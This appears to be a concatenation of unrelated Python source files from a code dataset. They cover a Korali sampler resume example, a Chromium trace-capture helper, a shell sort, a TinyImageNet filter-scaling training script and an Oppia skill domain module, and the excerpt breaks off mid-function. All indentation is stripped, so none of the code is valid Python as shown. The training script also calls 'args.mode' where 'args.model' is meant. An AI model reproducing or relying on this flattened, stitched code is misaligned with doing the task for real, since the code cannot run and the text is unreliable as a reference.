# In this example, we demonstrate how a Korali experiment can
# be resumed from any point (generation). This is a useful feature
# for continuing jobs after an error, or to fragment big jobs into
# smaller ones that can better fit a supercomputer queue.
#
# First, we run a simple Korali experiment.
import sys
sys.path.append('./_model')
from model import *
import korali
k = korali.Engine()
e = korali.Experiment()
e["Problem"]["Type"] = "Bayesian/Custom"
e["Problem"]["Likelihood Model"] = calculateLogLikelihood
e["Solver"]["Type"] = "Sampler/TMCMC"
e["Solver"]["Population Size"] = 5000
e["Solver"]["Termination Criteria"]["Max Generations"] = 4
e["Distributions"][0]["Name"] = "Uniform 0"
e["Distributions"][0]["Type"] = "Univariate/Uniform"
e["Distributions"][0]["Minimum"] = -100.0
e["Distributions"][0]["Maximum"] = +100.0
e["Variables"][0]["Name"] = "X"
e["Variables"][0]["Prior Distribution"] = "Uniform 0"
print("\n-------------------------------------------------------------")
print("Running first generations...")
print("-------------------------------------------------------------\n")
k.run(e)
print("\n-------------------------------------------------------------")
print("Running last generations...")
print("-------------------------------------------------------------\n")
e["Solver"]["Termination Criteria"]["Max Generations"] = 10
k.run(e)
|
the-stack_0_6481 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import time
from profile_chrome import chrome_startup_tracing_agent
from profile_chrome import chrome_tracing_agent
from profile_chrome import ui
from profile_chrome import util
from systrace import output_generator
from systrace import tracing_controller
def _GetResults(trace_results, controller, output, compress, write_json,
interval):
ui.PrintMessage('Downloading...')
# Wait for the trace file to get written.
time.sleep(1)
for agent in controller.get_child_agents:
if isinstance(agent, chrome_tracing_agent.ChromeTracingAgent):
time.sleep(interval / 4)
# Ignore the systraceController because it will not contain any results,
# instead being in charge of collecting results.
trace_results = [x for x in controller.all_results if not (x.source_name ==
'systraceController')]
if not trace_results:
ui.PrintMessage('No results')
return ''
result = None
trace_results = output_generator.MergeTraceResultsIfNeeded(trace_results)
if not write_json:
ui.PrintMessage('Writing trace HTML...')
html_file = trace_results[0].source_name + '.html'
result = output_generator.GenerateHTMLOutput(trace_results, html_file)
ui.PrintMessage('\nWrote file://%s' % result)
elif compress and len(trace_results) == 1:
result = output or trace_results[0].source_name + '.gz'
util.WriteDataToCompressedFile(trace_results[0].raw_data, result)
elif len(trace_results) > 1:
result = (output or 'chrome-combined-trace-%s.zip' %
util.GetTraceTimestamp())
util.ArchiveData(trace_results, result)
elif output:
result = output
with open(result, 'wb') as f:
f.write(trace_results[0].raw_data)
else:
result = trace_results[0].source_name
with open(result, 'wb') as f:
f.write(trace_results[0].raw_data)
return result
def CaptureProfile(options, interval, modules, output=None,
compress=False, write_json=False):
"""Records a profiling trace saves the result to a file.
Args:
options: Command line options.
interval: Time interval to capture in seconds. An interval of None (or 0)
continues tracing until stopped by the user.
modules: The list of modules to initialize the tracing controller with.
output: Output file name or None to use an automatically generated name.
compress: If True, the result will be compressed either with gzip or zip
depending on the number of captured subtraces.
write_json: If True, prefer JSON output over HTML.
Returns:
Path to saved profile.
"""
agents_with_config = tracing_controller.CreateAgentsWithConfig(options,
modules)
if chrome_startup_tracing_agent in modules:
controller_config = tracing_controller.GetChromeStartupControllerConfig(
options)
else:
controller_config = tracing_controller.GetControllerConfig(options)
controller = tracing_controller.TracingController(agents_with_config,
controller_config)
try:
result = controller.StartTracing()
trace_type = controller.GetTraceType()
if not result:
ui.PrintMessage('Trace starting failed.')
if interval:
ui.PrintMessage(('Capturing %d-second %s. Press Enter to stop early...' %
(interval, trace_type)), eol='')
ui.WaitForEnter(interval)
else:
ui.PrintMessage('Capturing %s. Press Enter to stop...' % trace_type,
eol='')
raw_input()
ui.PrintMessage('Stopping...')
all_results = controller.StopTracing()
finally:
if interval:
ui.PrintMessage('done')
return _GetResults(all_results, controller, output, compress, write_json,
interval)
|
the-stack_0_6482 | def shellSort(arr):
_len = len(arr)
grap = _len
while grap > 1:
grap = grap // 2 # 间隔距离
for i in range(grap, _len):
j, curr = i, arr[i]
while j >= grap and curr < arr[j - grap]:
arr[j] = arr[j - grap] # 比 curr大 则把前面大的值往后存放
j -= grap # 前移比较
arr[j] = curr # 找到位置 存放
return arr
a = [31, 42, 13, 54, 5]
print(shellSort(a))
|
the-stack_0_6483 | '''
Run models (ResNet18, MobileNetV2) by scaling filter sizes to different ratios on TinyImageNet.
Stores accuracy for comparison plot.
Default Scaling Ratios: 0.25, 0.5, 0.75, 1.0
'''
from __future__ import print_function
import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath('.'))))
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data as utils_data
from torch.autograd import Variable
import torchvision
import torchvision.transforms as transforms
import numpy as np
import numpy.linalg as la
import pdb
import pickle
import visdom
import time
import torch.backends.cudnn as cudnn
import gc
import math
import argparse
import copy
from utils import progress_bar, save_checkpoint, adjust_learning_rate, accuracy, adjust_learning_rate_imagenet
import csv
from sklearn import linear_model
from model.VGG import vgg11
from model.preact_resnet import PreActResNet18
from model.resnet import *
from model.lenet import LeNet
from model.mobilenetv2 import MobileNetV2
from torch.optim.lr_scheduler import StepLR
from copy import deepcopy
##############
## Function ##
##############
def num_flat_features(x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def train(args, model, train_loader, optimizer, epoch, criterion, pruning_engine=None, scheduler=None):
"""Train for one epoch on the training set also performs pruning"""
train_loss = 0
train_acc = 0
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.cuda(), target.cuda()
# make sure that all gradients are zero
for p in model.parameters():
if p.grad is not None:
p.grad.detach_()
p.grad.zero_()
output = model(data)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
loss.backward()
optimizer.step()
train_loss += loss.item()
train_acc += prec1.item()
progress_bar(batch_idx, len(train_loader), 'Loss: %.3f | Acc: %.3f%%'
% (train_loss/(batch_idx+1), train_acc/(batch_idx+1)))
return train_acc/(batch_idx+1), train_loss/(batch_idx+1)
def validate(args, test_loader, model, criterion, epoch, pruning_engine=None, optimizer=None):
"""Perform validation on the validation set"""
test_loss = 0
test_acc = 0
# switch to evaluate mode
model.eval()
with torch.no_grad():
for batch_idx, (data, target) in enumerate(test_loader):
data = data.cuda()
target = target.cuda()
output = model(data)
loss = criterion(output, target)
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
test_loss += loss.item()
test_acc += prec1.item()
progress_bar(batch_idx, len(test_loader), 'Loss: %.3f | Acc: %.3f%%'
% (test_loss/(batch_idx+1), test_acc/(batch_idx+1)))
return test_acc/(batch_idx+1), test_loss/(batch_idx+1)
def main():
# Training settings
parser = argparse.ArgumentParser(description='Efficient Filter Scaling of Convolutional Neural Network')
parser.add_argument('--batch-size', type=int, default=128, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--epochs', type=int, default=150, metavar='N',
help='number of epochs to train (default: 40)')
parser.add_argument('--lr', type=float, default=0.1, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--weight_decay', type=float, default=5e-4,
help='weight decay (default: 5e-4)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--dataset', default="tinyimagenet", type=str,
help='dataset for experiment, choice: tinyimagenet', choices= ["tinyimagenet"])
parser.add_argument('--data', metavar='DIR', default='/DATA/tiny-imagenet-200', help='path to imagenet dataset')
parser.add_argument('--model', default="resnet18", type=str,
help='model selection, choices: vgg, mobilenetv2, resnet18',
choices=["mobilenetv2", "resnet18"])
parser.add_argument('--save', default='model',
help='model file')
parser.add_argument('--prune_fname', default='filename',
help='prune save file')
parser.add_argument('--descent_idx', type=int, default=14,
help='Iteration for Architecture Descent')
parser.add_argument('--morph', dest="morph", action='store_true', default=False,
help='Prunes only 50 percent of neurons, for comparison with MorphNet')
parser.add_argument('--uniform', dest="uniform", action='store_true', default=False,
help='Use uniform scaling instead of NeuralScale')
args = parser.parse_args()
##################
## Data loading ##
##################
kwargs = {'num_workers': 1, 'pin_memory': True}
if args.dataset == "tinyimagenet":
print("Using tiny-Imagenet Dataset")
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'test')
normalize = transforms.Normalize([0.4802, 0.4481, 0.3975], [0.2302, 0.2265, 0.2262])
train_dataset = torchvision.datasets.ImageFolder(
traindir,
transforms.Compose([
transforms.RandomCrop(64, padding=4),
transforms.RandomRotation(20),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]))
train_sampler = None
kwargs = {'num_workers': 16}
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=args.batch_size, shuffle=(train_sampler is None),
sampler=train_sampler, pin_memory=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
torchvision.datasets.ImageFolder(valdir, transforms.Compose([
transforms.ToTensor(),
normalize,
])),
batch_size=args.batch_size, shuffle=False, pin_memory=True, **kwargs)
else:
print("Dataset does not exist! [Imagenet]")
exit()
if args.dataset=='tinyimagenet':
num_classes = 200
else:
print("Only tinyimagenet")
exit()
ratios = [0.25, 0.5, 0.75, 1.0]
pruned_filters = None
neuralscale = True # turn on NeuralScale by default
if args.uniform:
neuralscale = False
if args.morph:
neuralscale = False
if args.model == "resnet18":
pruned_filters = [82,90,78,80,96,180,104,96,194,312,182,178,376,546,562,454,294] # resnet18 tinyimagenet
elif args.mode == "mobilenetv2":
pruned_filters = [28, 16, 24, 24, 32, 32, 30, 64, 59, 50, 41, 96, 73, 48, 160, 69, 47, 155, 360] # mobilenetv2 tinyimagenet
else:
print("{} not supported.".format(args.model))
exit()
for ratio in ratios:
print("Current ratio: {}".format(ratio))
###########
## Model ##
###########
print("Setting Up Model...")
if args.model == "resnet18":
model = PreActResNet18(ratio=ratio, neuralscale=neuralscale, num_classes=num_classes, dataset=args.dataset, prune_fname=args.prune_fname, descent_idx=args.descent_idx, pruned_filters=pruned_filters)
elif args.model == "mobilenetv2":
model = MobileNetV2(ratio=ratio, neuralscale=neuralscale, num_classes=num_classes, dataset=args.dataset, prune_fname=args.prune_fname, descent_idx=args.descent_idx, pruned_filters=pruned_filters)
else:
print(args.model, "model not supported [resnet18 mobilenetv2] only")
exit()
print("{} set up.".format(args.model))
# for model saving
model_path = "saved_models"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_save_folder = "%s/%s"%(model_path, args.model)
if not os.path.exists(log_save_folder):
os.makedirs(log_save_folder)
model_save_path = "%s/%s"%(log_save_folder, args.save) + "_checkpoint.t7"
model_state_dict = model.state_dict()
if args.save:
print("Model will be saved to {}".format(model_save_path))
save_checkpoint({
'state_dict': model_state_dict
}, False, filename = model_save_path)
else:
print("Save path not defined. Model will not be saved.")
# Assume cuda is available and uses single GPU
model.cuda()
cudnn.benchmark = True
# define objective
criterion = nn.CrossEntropyLoss()
######################
## Set up pruning ##
######################
# remove updates from gate layers, because we want them to be 0 or 1 constantly
parameters_for_update = []
parameters_for_update_named = []
for name, m in model.named_parameters():
if "gate" not in name:
parameters_for_update.append(m)
parameters_for_update_named.append((name, m))
else:
print("skipping parameter", name, "shape:", m.shape)
total_size_params = sum([np.prod(par.shape) for par in parameters_for_update])
print("Total number of parameters, w/o usage of bn consts: ", total_size_params)
optimizer = optim.SGD(parameters_for_update, lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
###############
## Training ##
###############
best_test_acc = 0
train_acc_plt = []
train_loss_plt = []
test_acc_plt = []
test_loss_plt = []
epoch_plt = []
for epoch in range(1, args.epochs + 1):
adjust_learning_rate_imagenet(args, optimizer, epoch, search=False)
print("Epoch: {}".format(epoch))
# train model
train_acc, train_loss = train(args, model, train_loader, optimizer, epoch, criterion)
# evaluate on validation set
test_acc, test_loss = validate(args, test_loader, model, criterion, epoch, optimizer=optimizer)
# remember best prec@1 and save checkpoint
is_best = test_acc > best_test_acc
best_test_acc = max(test_acc, best_test_acc)
model_state_dict = model.state_dict()
if args.save:
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model_state_dict,
'best_prec1': test_acc,
}, is_best, filename=model_save_path)
train_acc_plt.append(train_acc)
train_loss_plt.append(train_loss)
test_acc_plt.append(test_acc)
test_loss_plt.append(test_loss)
epoch_plt.append(epoch)
pickle_save = {
"ratio": ratio,
"train_acc": train_acc_plt,
"train_loss": train_loss_plt,
"test_acc": test_acc_plt,
"test_loss": test_loss_plt,
}
plot_path = "saved_plots"
if not os.path.exists(plot_path):
os.makedirs(plot_path)
log_save_folder = "%s/%s"%(plot_path, args.model)
if not os.path.exists(log_save_folder):
os.makedirs(log_save_folder)
pickle_out = open("%s/%s_%s.pk"%(log_save_folder, args.save, int(ratio*100)),"wb")
pickle.dump(pickle_save, pickle_out)
pickle_out.close()
if __name__ == '__main__':
main()
|
the-stack_0_6484 | # Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Domain objects relating to skills."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from constants import constants
from core.domain import change_domain
from core.domain import html_cleaner
from core.domain import state_domain
import feconf
import python_utils
import utils
# Do not modify the values of these constants. This is to preserve backwards
# compatibility with previous change dicts.
SKILL_PROPERTY_DESCRIPTION = 'description'
SKILL_PROPERTY_LANGUAGE_CODE = 'language_code'
SKILL_PROPERTY_SUPERSEDING_SKILL_ID = 'superseding_skill_id'
SKILL_PROPERTY_ALL_QUESTIONS_MERGED = 'all_questions_merged'
SKILL_CONTENTS_PROPERTY_EXPLANATION = 'explanation'
SKILL_CONTENTS_PROPERTY_WORKED_EXAMPLES = 'worked_examples'
SKILL_MISCONCEPTIONS_PROPERTY_NAME = 'name'
SKILL_MISCONCEPTIONS_PROPERTY_NOTES = 'notes'
SKILL_MISCONCEPTIONS_PROPERTY_FEEDBACK = 'feedback'
# These take additional 'property_name' and 'new_value' parameters and,
# optionally, 'old_value'.
CMD_UPDATE_SKILL_PROPERTY = 'update_skill_property'
CMD_UPDATE_SKILL_CONTENTS_PROPERTY = 'update_skill_contents_property'
CMD_UPDATE_SKILL_MISCONCEPTIONS_PROPERTY = (
'update_skill_misconceptions_property')
CMD_UPDATE_RUBRICS = 'update_rubrics'
CMD_ADD_SKILL_MISCONCEPTION = 'add_skill_misconception'
CMD_DELETE_SKILL_MISCONCEPTION = 'delete_skill_misconception'
CMD_CREATE_NEW = 'create_new'
CMD_MIGRATE_CONTENTS_SCHEMA_TO_LATEST_VERSION = (
'migrate_contents_schema_to_latest_version')
CMD_MIGRATE_MISCONCEPTIONS_SCHEMA_TO_LATEST_VERSION = (
'migrate_misconceptions_schema_to_latest_version')
CMD_MIGRATE_RUBRICS_SCHEMA_TO_LATEST_VERSION = (
'migrate_rubrics_schema_to_latest_version')
CMD_PUBLISH_SKILL = 'publish_skill'
class SkillChange(change_domain.BaseChange):
"""Domain object for changes made to skill object.
The allowed commands, together with the attributes:
- 'add_skill_misconception' (with new_misconception_dict)
- 'delete_skill_misconception' (with misconception_id)
- 'create_new'
- 'update_skill_property' (with property_name, new_value
and old_value)
- 'update_skill_contents_property' (with property_name,
new_value and old_value)
- 'update_skill_misconceptions_property' (
with misconception_id, property_name, new_value and old_value)
- 'migrate_contents_schema_to_latest_version' (with
from_version and to_version)
- 'migrate_misconceptions_schema_to_latest_version' (with
from_version and to_version)
"""
# The allowed list of skill properties which can be used in
# update_skill_property command.
SKILL_PROPERTIES = (
SKILL_PROPERTY_DESCRIPTION, SKILL_PROPERTY_LANGUAGE_CODE,
SKILL_PROPERTY_SUPERSEDING_SKILL_ID,
SKILL_PROPERTY_ALL_QUESTIONS_MERGED)
# The allowed list of skill contents properties which can be used in
# update_skill_contents_property command.
SKILL_CONTENTS_PROPERTIES = (
SKILL_CONTENTS_PROPERTY_EXPLANATION,
SKILL_CONTENTS_PROPERTY_WORKED_EXAMPLES)
# The allowed list of misconceptions properties which can be used in
# update_skill_misconceptions_property command.
SKILL_MISCONCEPTIONS_PROPERTIES = (
SKILL_MISCONCEPTIONS_PROPERTY_NAME,
SKILL_MISCONCEPTIONS_PROPERTY_NOTES,
SKILL_MISCONCEPTIONS_PROPERTY_FEEDBACK
)
ALLOWED_COMMANDS = [{
'name': CMD_CREATE_NEW,
'required_attribute_names': [],
'optional_attribute_names': []
}, {
'name': CMD_ADD_SKILL_MISCONCEPTION,
'required_attribute_names': ['new_misconception_dict'],
'optional_attribute_names': []
}, {
'name': CMD_DELETE_SKILL_MISCONCEPTION,
'required_attribute_names': ['misconception_id'],
'optional_attribute_names': []
}, {
'name': CMD_UPDATE_RUBRICS,
'required_attribute_names': ['difficulty', 'explanation'],
'optional_attribute_names': []
}, {
'name': CMD_UPDATE_SKILL_MISCONCEPTIONS_PROPERTY,
'required_attribute_names': [
'misconception_id', 'property_name', 'new_value', 'old_value'],
'optional_attribute_names': [],
'allowed_values': {'property_name': SKILL_MISCONCEPTIONS_PROPERTIES}
}, {
'name': CMD_UPDATE_SKILL_PROPERTY,
'required_attribute_names': ['property_name', 'new_value', 'old_value'],
'optional_attribute_names': [],
'allowed_values': {'property_name': SKILL_PROPERTIES}
}, {
'name': CMD_UPDATE_SKILL_CONTENTS_PROPERTY,
'required_attribute_names': ['property_name', 'new_value', 'old_value'],
'optional_attribute_names': [],
'allowed_values': {'property_name': SKILL_CONTENTS_PROPERTIES}
}, {
'name': CMD_MIGRATE_CONTENTS_SCHEMA_TO_LATEST_VERSION,
'required_attribute_names': ['from_version', 'to_version'],
'optional_attribute_names': []
}, {
'name': CMD_MIGRATE_MISCONCEPTIONS_SCHEMA_TO_LATEST_VERSION,
'required_attribute_names': ['from_version', 'to_version'],
'optional_attribute_names': []
}, {
'name': CMD_MIGRATE_RUBRICS_SCHEMA_TO_LATEST_VERSION,
'required_attribute_names': ['from_version', 'to_version'],
'optional_attribute_names': []
}]
class Misconception(python_utils.OBJECT):
"""Domain object describing a skill misconception."""
def __init__(
self, misconception_id, name, notes, feedback):
"""Initializes a Misconception domain object.
Args:
misconception_id: int. The unique id of each misconception.
name: str. The name of the misconception.
notes: str. General advice for creators about the
misconception (including examples) and general notes. This
should be an html string.
feedback: str. This can auto-populate the feedback field
when an answer group has been tagged with a misconception. This
should be an html string.
"""
self.id = misconception_id
self.name = name
self.notes = html_cleaner.clean(notes)
self.feedback = html_cleaner.clean(feedback)
def to_dict(self):
"""Returns a dict representing this Misconception domain object.
Returns:
A dict, mapping all fields of Misconception instance.
"""
return {
'id': self.id,
'name': self.name,
'notes': self.notes,
'feedback': self.feedback
}
@classmethod
def from_dict(cls, misconception_dict):
"""Returns a Misconception domain object from a dict.
Args:
misconception_dict: dict. The dict representation of
Misconception object.
Returns:
Misconception. The corresponding Misconception domain object.
"""
misconception = cls(
misconception_dict['id'], misconception_dict['name'],
misconception_dict['notes'], misconception_dict['feedback'])
return misconception
@classmethod
def require_valid_misconception_id(cls, misconception_id):
"""Validates the misconception id for a Misconception object.
Args:
misconception_id: int. The misconception id to be validated.
Raises:
ValidationError. The misconception id is invalid.
"""
if not isinstance(misconception_id, int):
raise utils.ValidationError(
'Expected misconception ID to be an integer, received %s' %
misconception_id)
def validate(self):
"""Validates various properties of the Misconception object.
Raises:
ValidationError: One or more attributes of the misconception are
invalid.
"""
self.require_valid_misconception_id(self.id)
if not isinstance(self.name, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected misconception name to be a string, received %s' %
self.name)
utils.require_valid_name(
self.name, 'misconception_name', allow_empty=False)
if not isinstance(self.notes, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected misconception notes to be a string, received %s' %
self.notes)
if not isinstance(self.feedback, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected misconception feedback to be a string, received %s' %
self.feedback)
class Rubric(python_utils.OBJECT):
"""Domain object describing a skill rubric."""
def __init__(self, difficulty, explanation):
"""Initializes a Rubric domain object.
Args:
difficulty: str. The question difficulty that this rubric addresses.
explanation: str. The explanation for the corresponding difficulty.
"""
self.difficulty = difficulty
self.explanation = html_cleaner.clean(explanation)
def to_dict(self):
"""Returns a dict representing this Rubric domain object.
Returns:
A dict, mapping all fields of Rubric instance.
"""
return {
'difficulty': self.difficulty,
'explanation': self.explanation
}
@classmethod
def from_dict(cls, rubric_dict):
"""Returns a Rubric domain object from a dict.
Args:
rubric_dict: dict. The dict representation of Rubric object.
Returns:
Rubric. The corresponding Rubric domain object.
"""
rubric = cls(
rubric_dict['difficulty'], rubric_dict['explanation'])
return rubric
def validate(self):
"""Validates various properties of the Rubric object.
Raises:
ValidationError: One or more attributes of the rubric are
invalid.
"""
if not isinstance(self.difficulty, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected difficulty to be a string, received %s' %
self.difficulty)
if self.difficulty not in constants.SKILL_DIFFICULTIES:
raise utils.ValidationError(
'Invalid difficulty received for rubric: %s' % self.difficulty)
if not isinstance(self.explanation, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected explanation to be a string, received %s' %
self.explanation)
if self.explanation == '' or self.explanation == '<p></p>':
raise utils.ValidationError('Explanation should be non empty')
class SkillContents(python_utils.OBJECT):
"""Domain object representing the skill_contents dict."""
def __init__(
self, explanation, worked_examples, recorded_voiceovers,
written_translations):
"""Constructs a SkillContents domain object.
Args:
explanation: SubtitledHtml. An explanation on how to apply the
skill.
worked_examples: list(SubtitledHtml). A list of worked examples
for the skill. Each element should be a SubtitledHtml object.
recorded_voiceovers: RecordedVoiceovers. The recorded voiceovers for
the skill contents and their translations in different
languages.
written_translations: WrittenTranslations. A text translation of
the skill contents.
"""
self.explanation = explanation
self.worked_examples = worked_examples
self.recorded_voiceovers = recorded_voiceovers
self.written_translations = written_translations
def validate(self):
"""Validates various properties of the SkillContents object.
Raises:
ValidationError: One or more attributes of skill contents are
invalid.
"""
available_content_ids = set([])
if not isinstance(self.explanation, state_domain.SubtitledHtml):
raise utils.ValidationError(
'Expected skill explanation to be a SubtitledHtml object, '
'received %s' % self.explanation)
self.explanation.validate()
available_content_ids.add(self.explanation.content_id)
if not isinstance(self.worked_examples, list):
raise utils.ValidationError(
'Expected worked examples to be a list, received %s' %
self.worked_examples)
for example in self.worked_examples:
if not isinstance(example, state_domain.SubtitledHtml):
raise utils.ValidationError(
'Expected worked example to be a SubtitledHtml object, '
'received %s' % example)
if example.content_id in available_content_ids:
raise utils.ValidationError(
'Found a duplicate content id %s' % example.content_id)
available_content_ids.add(example.content_id)
example.validate()
self.recorded_voiceovers.validate(available_content_ids)
self.written_translations.validate(available_content_ids)
def to_dict(self):
"""Returns a dict representing this SkillContents domain object.
Returns:
A dict, mapping all fields of SkillContents instance.
"""
return {
'explanation': self.explanation.to_dict(),
'worked_examples': [worked_example.to_dict()
for worked_example in self.worked_examples],
'recorded_voiceovers': self.recorded_voiceovers.to_dict(),
'written_translations': self.written_translations.to_dict()
}
@classmethod
def from_dict(cls, skill_contents_dict):
"""Return a SkillContents domain object from a dict.
Args:
skill_contents_dict: dict. The dict representation of
SkillContents object.
Returns:
SkillContents. The corresponding SkillContents domain object.
"""
skill_contents = cls(
state_domain.SubtitledHtml(
skill_contents_dict['explanation']['content_id'],
skill_contents_dict['explanation']['html']),
[state_domain.SubtitledHtml(
worked_example['content_id'],
worked_example['html'])
for worked_example in skill_contents_dict['worked_examples']],
state_domain.RecordedVoiceovers.from_dict(skill_contents_dict[
'recorded_voiceovers']),
state_domain.WrittenTranslations.from_dict(skill_contents_dict[
'written_translations'])
)
return skill_contents
class Skill(python_utils.OBJECT):
"""Domain object for an Oppia Skill."""
def __init__(
self, skill_id, description, misconceptions, rubrics,
skill_contents, misconceptions_schema_version,
rubric_schema_version, skill_contents_schema_version,
language_code, version, next_misconception_id, superseding_skill_id,
all_questions_merged, created_on=None, last_updated=None):
"""Constructs a Skill domain object.
Args:
skill_id: str. The unique ID of the skill.
description: str. Describes the observable behaviour of the skill.
misconceptions: list(Misconception). The list of misconceptions
associated with the skill.
rubrics: list(Rubric). The list of rubrics that explain each
difficulty level of a skill.
skill_contents: SkillContents. The object representing the contents
of the skill.
misconceptions_schema_version: int. The schema version for the
misconceptions object.
rubric_schema_version: int. The schema version for the
rubric object.
skill_contents_schema_version: int. The schema version for the
skill_contents object.
language_code: str. The ISO 639-1 code for the language this
skill is written in.
version: int. The version of the skill.
next_misconception_id: int. The misconception id to be used by
the next misconception added.
superseding_skill_id: str|None. Skill ID of the skill we
merge this skill into. This is non null only if we indicate
that this skill is a duplicate and needs to be merged into
another one.
all_questions_merged: bool. Flag that indicates if all
questions are moved from this skill to the superseding skill.
created_on: datetime.datetime. Date and time when the skill is
created.
last_updated: datetime.datetime. Date and time when the
skill was last updated.
"""
self.id = skill_id
self.description = description
self.misconceptions = misconceptions
self.skill_contents = skill_contents
self.misconceptions_schema_version = misconceptions_schema_version
self.rubric_schema_version = rubric_schema_version
self.skill_contents_schema_version = skill_contents_schema_version
self.language_code = language_code
self.created_on = created_on
self.last_updated = last_updated
self.version = version
self.rubrics = rubrics
self.next_misconception_id = next_misconception_id
self.superseding_skill_id = superseding_skill_id
self.all_questions_merged = all_questions_merged
@classmethod
def require_valid_skill_id(cls, skill_id):
"""Checks whether the skill id is a valid one.
Args:
skill_id: str. The skill id to validate.
"""
if not isinstance(skill_id, python_utils.BASESTRING):
raise utils.ValidationError('Skill id should be a string.')
if len(skill_id) != 12:
raise utils.ValidationError('Invalid skill id.')
@classmethod
def require_valid_description(cls, description):
"""Checks whether the description of the skill is a valid one.
Args:
description: str. The description to validate.
"""
if not isinstance(description, python_utils.BASESTRING):
raise utils.ValidationError('Description should be a string.')
if description == '':
raise utils.ValidationError('Description field should not be empty')
def validate(self):
"""Validates various properties of the Skill object.
Raises:
ValidationError: One or more attributes of skill are invalid.
"""
self.require_valid_description(self.description)
Misconception.require_valid_misconception_id(self.next_misconception_id)
if not isinstance(self.misconceptions_schema_version, int):
raise utils.ValidationError(
'Expected misconceptions schema version to be an integer, '
'received %s' % self.misconceptions_schema_version)
if (
self.misconceptions_schema_version !=
feconf.CURRENT_MISCONCEPTIONS_SCHEMA_VERSION):
raise utils.ValidationError(
'Expected misconceptions schema version to be %s, received %s'
% (
feconf.CURRENT_MISCONCEPTIONS_SCHEMA_VERSION,
self.misconceptions_schema_version)
)
if not isinstance(self.rubric_schema_version, int):
raise utils.ValidationError(
'Expected rubric schema version to be an integer, '
'received %s' % self.rubric_schema_version)
if (
self.rubric_schema_version !=
feconf.CURRENT_RUBRIC_SCHEMA_VERSION):
raise utils.ValidationError(
'Expected rubric schema version to be %s, received %s'
% (
feconf.CURRENT_RUBRIC_SCHEMA_VERSION,
self.rubric_schema_version)
)
if not isinstance(self.skill_contents_schema_version, int):
raise utils.ValidationError(
'Expected skill contents schema version to be an integer, '
'received %s' % self.skill_contents_schema_version)
if (
self.skill_contents_schema_version !=
feconf.CURRENT_SKILL_CONTENTS_SCHEMA_VERSION):
raise utils.ValidationError(
'Expected skill contents schema version to be %s, received %s'
% (
feconf.CURRENT_SKILL_CONTENTS_SCHEMA_VERSION,
self.skill_contents_schema_version)
)
if not isinstance(self.language_code, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected language code to be a string, received %s' %
self.language_code)
if not utils.is_valid_language_code(self.language_code):
raise utils.ValidationError(
'Invalid language code: %s' % self.language_code)
if not isinstance(self.skill_contents, SkillContents):
raise utils.ValidationError(
'Expected skill_contents to be a SkillContents object, '
'received %s' % self.skill_contents)
self.skill_contents.validate()
if not isinstance(self.rubrics, list):
raise utils.ValidationError(
'Expected rubrics to be a list, '
'received %s' % self.skill_contents)
difficulties_list = []
for rubric in self.rubrics:
if not isinstance(rubric, Rubric):
raise utils.ValidationError(
'Expected each rubric to be a Rubric '
'object, received %s' % rubric)
if rubric.difficulty in difficulties_list:
raise utils.ValidationError(
'Duplicate rubric found for: %s' % rubric.difficulty)
difficulties_list.append(rubric.difficulty)
rubric.validate()
if len(difficulties_list) != 3:
raise utils.ValidationError(
'All 3 difficulties should be addressed in rubrics')
if difficulties_list != constants.SKILL_DIFFICULTIES:
raise utils.ValidationError(
'The difficulties should be ordered as follows [%s, %s, %s]'
% (
constants.SKILL_DIFFICULTIES[0],
constants.SKILL_DIFFICULTIES[1],
constants.SKILL_DIFFICULTIES[2]))
if not isinstance(self.misconceptions, list):
raise utils.ValidationError(
'Expected misconceptions to be a list, '
'received %s' % self.misconceptions)
misconception_id_list = []
for misconception in self.misconceptions:
if not isinstance(misconception, Misconception):
raise utils.ValidationError(
'Expected each misconception to be a Misconception '
'object, received %s' % misconception)
if misconception.id in misconception_id_list:
raise utils.ValidationError(
'Duplicate misconception ID found: %s' % misconception.id)
misconception_id_list.append(misconception.id)
if int(misconception.id) >= int(self.next_misconception_id):
raise utils.ValidationError(
'The misconception with id %s is out of bounds.'
% misconception.id)
misconception.validate()
if (self.all_questions_merged and
self.superseding_skill_id is None):
raise utils.ValidationError(
'Expected a value for superseding_skill_id when '
'all_questions_merged is True.')
if (self.superseding_skill_id is not None and
self.all_questions_merged is None):
raise utils.ValidationError(
'Expected a value for all_questions_merged when '
'superseding_skill_id is set.')
def to_dict(self):
"""Returns a dict representing this Skill domain object.
Returns:
A dict, mapping all fields of Skill instance.
"""
return {
'id': self.id,
'description': self.description,
'misconceptions': [
misconception.to_dict()
for misconception in self.misconceptions],
'rubrics': [
rubric.to_dict() for rubric in self.rubrics],
'skill_contents': self.skill_contents.to_dict(),
